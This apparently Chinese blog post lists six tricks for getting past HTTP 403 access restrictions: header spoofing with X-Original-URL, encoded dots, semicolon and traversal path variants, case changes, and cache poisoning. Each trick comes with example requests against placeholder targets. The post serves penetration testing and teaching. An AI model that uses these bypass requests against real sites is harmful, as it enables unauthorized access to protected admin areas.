🚀 403 页面绕过技巧

  1. 🌐 使用 "X-Original-URL" 头:

    • 原理 :某些服务器在处理请求时,会检查 X-Original-URL 头部来确定请求的原始 URL。这种方法利用了服务器对 X-Original-URL 头部的信任,将其值设置为受限制的路径,从而绕过访问控制。

    • 原始请求:

      http 复制代码
      GET /admin HTTP/1.1
      Host: target.com
    • 绕过请求:

      http 复制代码
      GET /anything HTTP/1.1
      Host: target.com
      X-Original-URL: /admin
  2. ✨ 在第一个斜杠后添加 %2e

    • 原理%2e 是 URL 编码表示的点 (.),某些服务器可能会错误地解析它,导致忽略路径的一部分,从而访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin => 403
    • 绕过请求:

      http 复制代码
      http://target.com/%2e/admin => 200
  3. 🛠 尝试在 URL 中添加点 (.) 斜杠 (/) 和分号 (;):

    • 原理:一些服务器在处理路径时,可能会忽略或错误处理特殊字符,如点 (.)、斜杠 (/) 和分号 (;),从而允许访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin => 403
    • 绕过请求:

      http 复制代码
      http://target.com/secret/. => 200
      http://target.com/secret//. => 200
      http://target.com/./secret/.. => 200
      http://target.com/;/secret => 200
      http://target.com/;//secret => 200
  4. 🗂 在目录名称后添加 ../;

    • 原理 :目录遍历攻击的一种变体,通过在路径中添加 ../;,可能会绕过服务器的访问控制检查,直接访问受限制的资源。

    • 原始请求:

      http 复制代码
      http://target.com/admin
    • 绕过请求:

      http 复制代码
      http://target.com/admin../;
  5. 🔠 尝试将 URL 中的字母大写:

    • 原理:某些服务器对路径区分大小写,通过更改路径中某些字母的大小写,可能会绕过访问控制检查。

    • 原始请求:

      http 复制代码
      http://target.com/admin
    • 绕过请求:

      http 复制代码
      http://target.com/aDmIN
  6. 📦 通过 Web 缓存中毒:

    • 原理:利用 Web 缓存服务器对请求头的信任,将受限制路径的值存入缓存中,从而在后续请求中绕过访问控制。

    • 绕过请求:

      http 复制代码
      GET /anything HTTP/1.1
      Host: victim.com
      X-Original-URL: /admin
相关推荐
大神科技AI定制2 小时前
企业级OpenClaw落地指南:如何通过私有化部署构建安全AI Agent工作流?
人工智能·安全
aaaffaewrerewrwer3 小时前
免费在线 2048 游戏推荐|经典数字合并玩法 + 流畅浏览器体验
安全·游戏·个人开发
冷酷的兔先生3 小时前
什么样的设计,才配得上“宠物空调”这个名字?——从功能设备到环境控制系统的判定标准
安全·宠物
53AI5 小时前
制造业智能安全生产监控:从“被动应对“到“主动预防“的转型之路
安全·知识库·制造业·预警
高翔·权衡之境6 小时前
主题4:差错控制——噪声中如何保真?
驱动开发·安全·缓存·系统安全·信息与通信
中科固源7 小时前
Wisdom平台技术解析:通讯协议安全与兼容性模糊测试实践
安全·模糊测试·商业航天
@insist1238 小时前
信息安全工程师-应急响应基础:核心概念、法律要求与分级标准
安全·软考·信息安全工程师·软件水平考试
阿部多瑞 ABU8 小时前
法律-社会悖论:一种根本矛盾的辩证分析
安全
胡志辉8 小时前
邮件中点击“加载图片”,你的IP地址已经被泄漏
前端·后端·安全
亚远景aspice9 小时前
亚远景热烈祝贺凌骁能源通过ASPICE CL2评估
安全·汽车